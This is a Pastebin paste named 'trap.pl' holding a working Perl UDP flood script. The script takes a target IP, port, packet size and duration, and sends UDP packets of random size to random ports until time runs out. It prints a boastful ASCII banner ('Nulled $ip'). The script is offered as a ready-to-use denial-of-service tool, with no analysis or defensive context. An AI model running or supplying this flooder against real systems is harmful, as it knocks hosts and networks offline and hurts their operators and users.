Advertisement
Dos_script_bin

trap.pl

Aug 26th, 2017
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.41 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ##
  4. #!/usr/bin/perl
  5.  
  6. use Socket;
  7. use strict;
  8.  
  9. my ($ip,$port,$size,$time) = @ARGV;
  10.  
  11. my ($iaddr,$endtime,$psize,$pport);
  12.  
  13. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  14. $endtime = time() + ($time ? $time : 100);
  15. socket(flood, PF_INET, SOCK_DGRAM, 17);
  16.  
  17.  
  18. print <<EOTEXT;
  19.  
  20.  
  21. _____________¶____¶_______________________________
  22. ____________¶¶____¶¶______________________________
  23. ___________¶¶¶___¶¶¶______________________________
  24. ___________¶¶¶___¶¶¶______________________________
  25. ___________¶¶___¶¶¶_______________________________
  26. ___________¶¶___¶¶________________________________
  27. ___________¶¶_¶¶__________________________________
  28. ___________¶¶¶____________________________________
  29. ____________¶¶____________________________________
  30. _____________888¶¶________________________________
  31. ____________¶¶¶_8¶¶_______________________________
  32. ____________¶¶¶¶_88¶______________________________
  33. _____________¶¶¶8_88¶_____________________________
  34. _____________8¶¶¶8_88¶____________________________
  35. ______________¶¶¶¶__888___________________________
  36. ______________¶¶¶¶¶_88¶8__________________________
  37. _______________¶¶¶¶¶_88¶8_________________________
  38. ________________¶¶¶¶8_88¶8________________________
  39. ________________¶¶¶¶¶__88¶________________________
  40. _________________¶¶¶¶¶_88¶________________________
  41. _________________¶¶¶¶¶¶_88¶_______________________
  42. ________________¶¶¶¶¶¶¶8_88¶______________________
  43. ______________8¶88¶88¶¶¶8_¶8¶_____________________
  44. ______________¶¶_8¶¶¶¶¶¶¶_8¶8¶8___________________
  45. ______________8¶8_8¶¶¶¶¶¶¶8¶¶8¶¶__________________
  46. _______________¶¶_8¶¶8¶¶¶¶88¶¶8¶¶8________________
  47. ____________8888¶¶¶¶¶88¶¶8¶88¶¶¶¶8________________
  48. _________8888_88¶¶¶¶¶¶¶¶¶¶8¶__¶¶¶_________________
  49. ________8_8888__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________________
  50. _______8_888_888___888¶¶¶¶¶¶¶¶¶¶__________________
  51. ______8__8¶8__¶¶8_____88¶¶¶¶¶¶8___________________
  52. _____¶¶8888888__8888____8¶¶¶¶¶¶8__________________
  53. ____¶¶¶¶¶¶88¶8___8¶¶88_8¶¶¶¶¶8¶8__________________
  54. ____¶¶¶¶¶¶¶¶¶¶___8¶¶¶¶¶¶¶¶¶¶8_____________________
  55. _____¶¶¶8¶¶¶¶8__888¶¶888¶¶¶¶¶¶____________________
  56. ______¶¶¶¶888¶8_88¶¶¶¶¶¶¶¶¶¶¶¶¶___________________
  57. _______¶¶¶¶888¶¶¶¶¶8¶¶¶¶¶¶¶¶¶¶¶¶__________________
  58. _______¶¶¶¶¶¶¶¶¶¶¶8___¶¶¶¶8¶¶¶¶¶¶_________________
  59. ______8¶¶¶¶¶¶¶¶¶¶______¶88¶¶¶¶¶¶¶¶8_______________
  60. ______¶8¶¶¶¶¶¶¶¶8______¶¶¶¶¶¶8888¶¶8______________
  61. _____8¶8¶¶¶8¶¶¶¶________¶¶¶888__8888¶8____________
  62. ____8¶¶¶¶¶8¶¶¶¶¶________8¶8__88____888¶8__________
  63. ___88_88¶¶¶¶¶¶¶__________88__888______88¶8________
  64. __88______888¶____________8____88________8¶8______
  65.  
  66. MemeCFW And TrapInc
  67. Nulled $ip
  68. For $time Seconds
  69.  
  70. EOTEXT
  71.  
  72.  
  73. for (;time() <= $endtime;) {
  74. $psize = $size ? $size : int(rand(1024-64)+64) ;
  75. $pport = $port ? $port : int(rand(65500))+1;
  76.  
  77. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  78. $iaddr));}for (;time() <= $endtime;) {
  79. $psize = $size ? $size : int(rand(1024-64)+64) ;
  80. $pport = $port ? $port : int(rand(65500))+1;
  81.  
  82. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  83. $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement